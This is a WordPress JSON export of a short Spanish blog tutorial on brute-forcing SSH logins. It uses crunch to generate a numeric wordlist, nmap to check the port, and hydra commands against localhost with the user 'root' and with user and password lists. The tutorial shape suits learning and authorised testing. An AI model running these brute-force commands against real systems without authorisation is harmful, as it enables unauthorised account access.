define('DISALLOW_FILE_EDIT', true); define('DISALLOW_FILE_MODS', true);{"id":309,"date":"2020-01-11T22:28:52","date_gmt":"2020-01-11T21:28:52","guid":{"rendered":"http:\/\/www.monovarlinux.org\/?p=309"},"modified":"2020-01-19T20:28:37","modified_gmt":"2020-01-19T19:28:37","slug":"309","status":"publish","type":"post","link":"http:\/\/www.monovarlinux.org\/?p=309","title":{"rendered":"HYDRA: Ataques de fuerza bruta SSH"},"content":{"rendered":"
\n
\n
\n
Hoy he estado trasteando un poco con utilidades como ‘crunch’ para la generaci\u00f3n de diccionarios y hydra para el uso de estos diccionarios a la hora de intentar realizar una autenticaci\u00f3n.<\/article>\n

El uso de crunch es simple:<\/p>\n

\n
crunch minimo<\/span> maximo<\/span> caracteres\r\n<\/code><\/pre>\n
Mininimo ser\u00e1 n\u00famero m\u00ednimo de caracteres que tendr\u00e1n las palabras del diccionario y maximo lo mismo pero m\u00e1ximo. Caracteres ser\u00e1n la combinaci\u00f3n de caracteres que usar\u00e1 para \u00abfabricar\u00bb todo el diccionaro. Por ejemplo, si quisiesemos que solamente utilizar\u00e1 numeros en las combinaciones\u00a0 y como minimo y maximo 2 digitos:<\/p>\n<\/article>\n
crunch 2 2 0123456789<\/code><\/p>\n
Hydra es la herramienta que automatiza la prueba de usuarios y contrase\u00f1as en una gran variedad de servicios. .
\nLos par\u00e1metros que se van a utilizar en este ejemplo son los siguientes:<\/p>\n
-l LOGIN \/ -L FILE: Establecer el nombre del<\/span> usuario que se va a<\/span> utilizar o una \r\nlista de nombres a<\/span> probar. \r\n\r\n-p<\/span> PASS \/ -P FILE: Contrase\u00f1a<\/span> a<\/span> usar o lista de las mismas (diccionario) que se \r\nvan a<\/span> probar. \r\n\r\n-f\/-F: Terminar la ejecuci\u00f3n de programa cuando se encuentre un par usuario\/\r\ncontrase\u00f1a<\/span> v\u00e1lido. \r\n\r\n-s PORT: Especificar el Puerto si \u00e9ste es distinto al Puerto por defecto. \r\n\r\n-v \/ -V \/ -d: Activar el modo debug (depuraci\u00f3n) para obtener m\u00e1s informaci\u00f3n \r\nsobre la ejecuci\u00f3n de la herramienta.  \r\n<\/code><\/pre>\n
De esta forma con nmap podemos comprobar si la maquina objetivo tiene el servicio ssh abierto:<\/p>\n
nmap<\/span> \u2013Pn<\/span> 127.0<\/span>.0<\/span>.1<\/span>\r\n<\/code><\/pre>\n
Generamos el diccionario con todas las combinaciones posibles que nos interesan:<\/p>\n
crunch 3<\/span> 3<\/span> 0123456789<\/span> > pass.txt\r\n<\/code><\/pre>\n
Y realizamos el intento de login con hydra utilizando todos las palabras que nos gener\u00f3 crunch y con el usuario ‘root’:<\/p>\n
hydra<\/span> 127.0<\/span>.0<\/span>.1<\/span> ssh<\/span> -s<\/span> 22 -l<\/span> root<\/span> -P<\/span> pass<\/span>.txt<\/span> -f<\/span> -vV<\/span> \r\n<\/code><\/pre>\n<\/article>\n<\/div>\n<\/section>\n<\/div>\n
\u00a0<\/em><\/strong><\/p>\n
Podemos utilizar tambien un diccionario con nombres de usuario (si no lo conocemos). Utilizamos el parametro -L con hydra para indicarle que utilice ese fichero para la prueba de user\/pass.<\/p>\n
\n
\n
\n
\n
hydra 127.0.0.1 ssh -s 22 -L users <\/span>-P worstpasswords.txt -f -vV \r\n<\/code><\/pre>\n<\/article>\n<\/div>\n
Una peque\u00f1a aportaci\u00f3n m\u00e1s a modo de apunte.<\/p>\n<\/section>\n
Espero que os ayude.<\/p>\n<\/div>\n
Share<\/h2><\/div>","protected":false},"excerpt":{"rendered":"
Hoy he estado trasteando un poco con utilidades como ‘crunch’ para la generaci\u00f3n de diccionarios y hydra para el uso de estos diccionarios a la hora de intentar realizar una autenticaci\u00f3n. El uso de crunch es simple: crunch minimo maximo … Sigue leyendo →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[6],"tags":[],"_links":{"self":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts\/309"}],"collection":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=309"}],"version-history":[{"count":2,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts\/309\/revisions"}],"predecessor-version":[{"id":312,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=\/wp\/v2\/posts\/309\/revisions\/312"}],"wp:attachment":[{"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=309"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.monovarlinux.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}